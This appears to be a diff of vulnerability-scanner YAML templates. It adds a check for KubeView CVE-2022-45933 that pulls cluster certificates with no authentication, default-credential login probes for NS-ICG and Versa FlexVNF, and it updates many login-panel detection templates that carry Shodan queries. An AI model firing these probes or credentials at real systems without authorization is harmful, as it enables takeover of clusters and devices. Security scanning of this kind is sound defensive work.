KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
|
||||
reference:
|
||||
- https://github.com/benc-uk/kubeview/issues/95
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-45933
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: http.title:"KubeView"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,kubeview,kubernetes,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/scrape/kube-system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'BEGIN CERTIFICATE'
|
||||
- 'END CERTIFICATE'
|
||||
- 'kubernetes.io'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,48 @@
|
|||
id: nsicg-default-login
|
||||
|
||||
info:
|
||||
name: Ns-icg Default Login
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
There is a weak password vulnerability in NetentSec Internet Control Gateway ns-icg of Beijing NetentScience and Technology Co., Ltd., which allows attackers to successfully log in to the system and obtain sensitive information by exploiting this loophole.
|
||||
reference: |
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: "NS-ICG"
|
||||
tags: nsicg,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 25s
|
||||
POST /user/login/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
usrname={{username}}&pass={{password}}&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
|
||||
|
||||
- |
|
||||
@timeout: 25s
|
||||
GET /user/main HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}/user/login/
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- ns25000
|
||||
password:
|
||||
- ns25000
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(all_headers_1, "/user/main/")'
|
||||
- 'status_code_1 == 302'
|
||||
- 'status_code_2 == 200'
|
||||
- contains(body_2, "var loguser = \'ns25000")
|
||||
condition: and
|
|
@ -0,0 +1,57 @@
|
|||
id: versa-flexvnf-default-login
|
||||
|
||||
info:
|
||||
name: Versa FlexVNF Web-UI - Default Login
|
||||
author: c-sh0
|
||||
severity: high
|
||||
reference:
|
||||
- https://versa-networks.com/products/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Flex VNF Web-UI"
|
||||
tags: default-login,versa,flexvnf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /authenticate HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /authenticate HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json;charset=UTF-8
|
||||
CSRF-Token: {{xsrf_token}}
|
||||
|
||||
{"username":"{{username}}","password":"{{password}}"}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- versa
|
||||
- admin
|
||||
password:
|
||||
- versa123
|
||||
- versa123
|
||||
|
||||
cookie-reuse: true
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{\"username\":\"{{username}}\",\"error\":false}"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: xsrf_token
|
||||
group: 1
|
||||
internal: true
|
||||
part: header
|
||||
regex:
|
||||
- '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)'
|
|
@ -1,9 +1,14 @@
|
|||
id: apache-jmeter-dashboard
|
||||
|
||||
info:
|
||||
name: Apache JMeter Dashboard
|
||||
name: Apache JMeter Dashboard Login Panel - Detect
|
||||
author: tess
|
||||
severity: low
|
||||
description: Apache JMeter Dashboard login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Apache JMeter Dashboard"
|
||||
|
@ -26,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,11 +1,13 @@
|
|||
id: public-tomcat-manager
|
||||
|
||||
info:
|
||||
name: Apache Tomcat Manager Disclosure
|
||||
name: Apache Tomcat Manager Login Panel - Detect
|
||||
author: Ahmed Sherif,geeknik,sinKettu
|
||||
severity: info
|
||||
description: An Apache Tomcat Manager panel was discovered.
|
||||
description: Apache Tomcat Manager login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
|
@ -20,6 +22,7 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: response
|
||||
words:
|
||||
- "Apache Tomcat"
|
||||
- "Tomcat Manager"
|
||||
|
@ -30,3 +33,5 @@ requests:
|
|||
- 401
|
||||
- 200
|
||||
condition: or
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: asus-router-panel
|
||||
|
||||
info:
|
||||
name: Asus Router Login Panel
|
||||
author: arafatansari
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: 'Server: httpd/2.0 port:8080'
|
||||
tags: panel,asus,router,iot
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Main_Login.asp"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>ASUS Login</title>'
|
||||
- 'Sign in with your ASUS router account'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: backpack-admin-panel
|
||||
|
||||
info:
|
||||
name: Backpack Admin Login Panel
|
||||
author: shine
|
||||
severity: info
|
||||
description: |
|
||||
An Backpack Admin dashboard was detected.
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Backpack Admin"
|
||||
tags: panel,backpack,admin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/login"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Backpack Admin'
|
||||
- 'backpack_alerts'
|
||||
condition: or
|
|
@ -0,0 +1,40 @@
|
|||
id: cisco-webvpn-detect
|
||||
|
||||
info:
|
||||
name: Cisco WebVPN Detect
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
- https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg=="
|
||||
google-query: intitle:"SSLVPN Service"
|
||||
tags: panel,cisco,vpn
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/webvpn.html"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "CISCO"
|
||||
- "AnyConnect"
|
||||
- "SSLVPN Service"
|
||||
condition: or
|
||||
case-insensitive: true
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "webvpncontext=00@.+"
|
||||
- "webvpn="
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: cudatel-panel
|
||||
|
||||
info:
|
||||
name: CudaTel Login Panel
|
||||
author: arafatansari
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"CudaTel"
|
||||
tags: panel,cudatel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'CudaTel Communications Server'
|
||||
- 'alt="CudaTel'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,9 +1,14 @@
|
|||
id: dplus-dashboard
|
||||
|
||||
info:
|
||||
name: DPLUS Dashboard Exposure
|
||||
name: DPLUS Dashboard Panel - Detect
|
||||
author: tess
|
||||
severity: info
|
||||
description: DPLUS Dashboard panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"DPLUS Dashboard"
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: dqs-superadmin
|
||||
id: dqs-superadmin-panel
|
||||
|
||||
info:
|
||||
name: DQS Superadmin
|
||||
name: DQS Superadmin Login Panel
|
||||
author: Hardik-Solanki
|
||||
severity: info
|
||||
metadata:
|
|
@ -0,0 +1,28 @@
|
|||
id: dradis-pro-panel
|
||||
|
||||
info:
|
||||
name: Dradis Professional Edition Panel
|
||||
author: righettod
|
||||
severity: info
|
||||
reference:
|
||||
- https://dradisframework.com/ce/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Dradis Professional Edition"
|
||||
tags: panel,dradis
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pro/login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Dradis Professional Edition"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,11 +1,16 @@
|
|||
id: exolis-engage-panel
|
||||
|
||||
info:
|
||||
name: Exolis Engage Panel
|
||||
name: Exolis Engage Panel - Detect
|
||||
author: righettod
|
||||
description: Exolis Engage panel was detected.
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.exolis.fr/en/solution-2/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"engage - Portail soignant"
|
||||
|
@ -33,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: fastpanel-hosting-control-panel
|
||||
|
||||
info:
|
||||
name: Fastpanel Hosting Control Panel
|
||||
name: FASTPANEL Login Panel - Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
description: FASTPANEL login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"FASTPANEL HOSTING CONTROL"
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: flahscookie-superadmin
|
||||
id: flahscookie-superadmin-panel
|
||||
|
||||
info:
|
||||
name: Flahscookie Superadmin
|
||||
name: Flahscookie Superadmin Login
|
||||
author: Hardik-Solanki
|
||||
severity: info
|
||||
metadata:
|
|
@ -1,4 +1,4 @@
|
|||
id: influxdb-detect
|
||||
id: influxdb-panel
|
||||
|
||||
info:
|
||||
name: InfluxDB Detect
|
||||
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.influxdata.com/
|
||||
metadata:
|
||||
shodan-query: http.title:"InfluxDB - Admin Interface"
|
||||
tags: tech,influxdb
|
||||
tags: panel,influxdb
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,11 +1,16 @@
|
|||
id: lacie-panel
|
||||
|
||||
info:
|
||||
name: LaCie Login Panel
|
||||
name: LaCie Login Panel - Detect
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
description: LaCie login panel was detected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/ghdb/7118
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,lacie,login,edb
|
||||
|
||||
requests:
|
||||
|
@ -29,3 +34,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: lancom-router-panel
|
||||
|
||||
info:
|
||||
name: Lancom Router Panel
|
||||
name: Lancom Router Login Panel - Detect
|
||||
author: __Fazal,daffainfo
|
||||
severity: info
|
||||
description: Lancom router login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: "true"
|
||||
shodan-query: html:"LANCOM Systems GmbH"
|
||||
|
@ -26,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: landrayoa-panel
|
||||
|
||||
info:
|
||||
name: LandrayOA Panel Login
|
||||
name: Landray Login Panel - Detect
|
||||
author: YanYun
|
||||
severity: info
|
||||
description: Landray login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,landrayoa
|
||||
|
||||
requests:
|
||||
|
@ -28,3 +33,5 @@ requests:
|
|||
words:
|
||||
- 'isopen='
|
||||
part: header
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: lansweeper-login
|
||||
|
||||
info:
|
||||
name: Lansweeper Login
|
||||
name: Lansweeper Login Panel - Detect
|
||||
author: divya_mudgal
|
||||
severity: info
|
||||
description: Lansweeper login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Lansweeper - Login"
|
||||
|
@ -31,3 +36,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- '"\/js\/CustomControls\.js\?([0-9.]+)" type="text\/javascript"'
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: lantronix-webmanager-panel
|
||||
|
||||
info:
|
||||
name: Lantronix WEB-Manager Panel
|
||||
name: Lantronix Web Manager Login Panel- Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
description: Lantronix Web Manager login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,lantronix
|
||||
|
||||
requests:
|
||||
|
@ -29,3 +34,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- ">Version ([0-9.]+)</font>"
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: lenovo-thinkserver-panel
|
||||
|
||||
info:
|
||||
name: Lenovo ThinkServer System Manager Panel Detect
|
||||
name: Lenovo ThinkServer System Manager Login Panel - Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
description: Lenovo ThinkServer System Manager login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,thinkserver,lenovo
|
||||
|
||||
requests:
|
||||
|
@ -21,3 +26,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: leostream-panel
|
||||
|
||||
info:
|
||||
name: Leostream Panel Detect
|
||||
name: Leostream Login Panel - Detect
|
||||
author: praetorian-thendrickson
|
||||
severity: info
|
||||
description: Leostream login panel was detected.
|
||||
reference:
|
||||
- https://leostream.com
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Leostream"
|
||||
tags: panel,leostream
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: librenms-login
|
||||
|
||||
info:
|
||||
name: LibreNMS Login Panel
|
||||
name: LibreNMS Login Panel - Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
description: LibreNMS login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
fofa-query: title="librenms"
|
||||
tags: librenms,panel
|
||||
|
@ -23,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,12 +1,17 @@
|
|||
id: liferay-portal
|
||||
|
||||
info:
|
||||
name: Liferay Portal Detect
|
||||
name: Liferay Login Panel - Detect
|
||||
author: organiccrap,dwisiswant0,ricardomaia
|
||||
severity: info
|
||||
description: Liferay login panel was detected,
|
||||
reference:
|
||||
- https://www.liferay.com/
|
||||
- https://github.com/mzer0one/CVE-2020-7961-POC
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:129457226
|
||||
|
@ -43,3 +48,5 @@ requests:
|
|||
group: 2
|
||||
regex:
|
||||
- '(i?)Liferay-Portal:.*?(\d+\.?.*?)\s'
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,11 +1,15 @@
|
|||
id: linkerd-panel
|
||||
|
||||
info:
|
||||
name: Linkered Panel Exposure
|
||||
name: Linkerd Panel - Detect
|
||||
author: tess
|
||||
severity: high
|
||||
description: |
|
||||
Linkerd is a service mesh for Kubernetes. It makes running services easier and safer by giving you runtime debugging, observability, reliability, and security—all without requiring any changes to your code.
|
||||
Linkerd panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"data-controller-namespace"
|
||||
|
@ -33,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: linksys-wifi-login
|
||||
|
||||
info:
|
||||
name: Linksys Smart Wi-Fi
|
||||
name: Linksys Smart Wi-Fi Login Panel - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: Linksys Smart Wi-Fi login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-dork: http.title:"Linksys Smart WI-FI"
|
||||
tags: tech,panel,linksys,iot
|
||||
|
@ -26,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: livehelperchat-admin-panel
|
||||
|
||||
info:
|
||||
name: Live Helper Chat Admin Panel
|
||||
name: Live Helper Chat Admin Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Live Helper Chat admin login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Live Helper Chat"
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: livezilla-login-panel
|
||||
|
||||
info:
|
||||
name: Livezilla login detect
|
||||
name: LiveZilla Login Panel - Detect
|
||||
author: __Fazal
|
||||
severity: info
|
||||
description: LiveZilla login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,livezilla,login
|
||||
|
||||
requests:
|
||||
|
@ -20,3 +25,5 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- 'LiveZilla'
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: locklizard-webviewer-panel
|
||||
|
||||
info:
|
||||
name: Locklizard Web Viewer Login Panel - Detect
|
||||
author: righettod
|
||||
severity: info
|
||||
description: Locklizard Web Viewer login panel was detected.
|
||||
reference:
|
||||
- https://www.locklizard.com/pdf_security_webviewer/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"Locklizard Web Viewer"
|
||||
tags: panel,locklizard,webviewer
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Locklizard Web Viewer'
|
||||
- 'Did you remember your password?'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
|
@ -1,9 +1,14 @@
|
|||
id: logitech-harmony-portal
|
||||
|
||||
info:
|
||||
name: Logitech Harmony Pro Installer Portal
|
||||
name: Logitech Harmony Pro Installer Portal Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: Logitech Harmony Pro Installer Portal login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"Logitech Harmony Pro Installer"
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: looker-panel
|
||||
|
||||
info:
|
||||
name: Looker Login Panel
|
||||
name: Looker Login Panel - Detect
|
||||
author: ritikchaddha,daffainfo
|
||||
severity: info
|
||||
description: Looker login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan: http.html:"lookerVersion"
|
||||
|
@ -32,3 +37,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- "lookerVersion: '([0-9.]+)',"
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: lucee-login
|
||||
|
||||
info:
|
||||
name: Lucee Web/Server Administrator Login
|
||||
name: Lucee Web and Lucee Server Admin Login Panel - Detect
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
description: Lucee admin login panels were detected in both Web and Server tabs.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Lucee"
|
||||
tags: panel,lucee
|
||||
|
@ -23,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,13 +1,17 @@
|
|||
id: mach-proweb-login
|
||||
|
||||
info:
|
||||
name: MACH-ProWeb Login Panel
|
||||
name: MACH-ProWeb Login Panel - Detect
|
||||
author: Jaskaran
|
||||
severity: info
|
||||
description: |
|
||||
MACH-ProWeb is building controller system used to access and control respective facilities easily
|
||||
MACH-ProWeb login panel was detected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/ghdb/8023
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
google-query: intitle:"Log on to MACH-ProWeb"
|
||||
|
@ -28,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: maestro-login-panel
|
||||
|
||||
info:
|
||||
name: Maestro - LuCI Login Panel
|
||||
name: Maestro LuCI Login Panel - Detect
|
||||
author: tess
|
||||
severity: info
|
||||
description: Maestro LuCI login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-dork: http.title:"Maestro - LuCI"
|
||||
|
@ -28,3 +33,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,14 +1,17 @@
|
|||
id: magento-admin-panel
|
||||
|
||||
info:
|
||||
name: Exposed Magento Admin Panel
|
||||
name: Magento Admin Login Panel - Detect
|
||||
author: TechbrunchFR,ritikchaddha
|
||||
severity: info
|
||||
description: |
|
||||
As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site
|
||||
from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
|
||||
Magento admin login panel was detected.
|
||||
reference:
|
||||
- https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.component:"Magento"
|
||||
|
@ -30,3 +33,5 @@ requests:
|
|||
- "Magento"
|
||||
- "Admin Panel"
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,13 +1,17 @@
|
|||
id: mailhog-panel
|
||||
|
||||
info:
|
||||
name: MailHog Panel Detect
|
||||
name: MailHog Panel - Detect
|
||||
author: kh4sh3i
|
||||
severity: info
|
||||
description: |
|
||||
MailHog is an email testing tool for developers
|
||||
MailHog panel was detected.
|
||||
reference:
|
||||
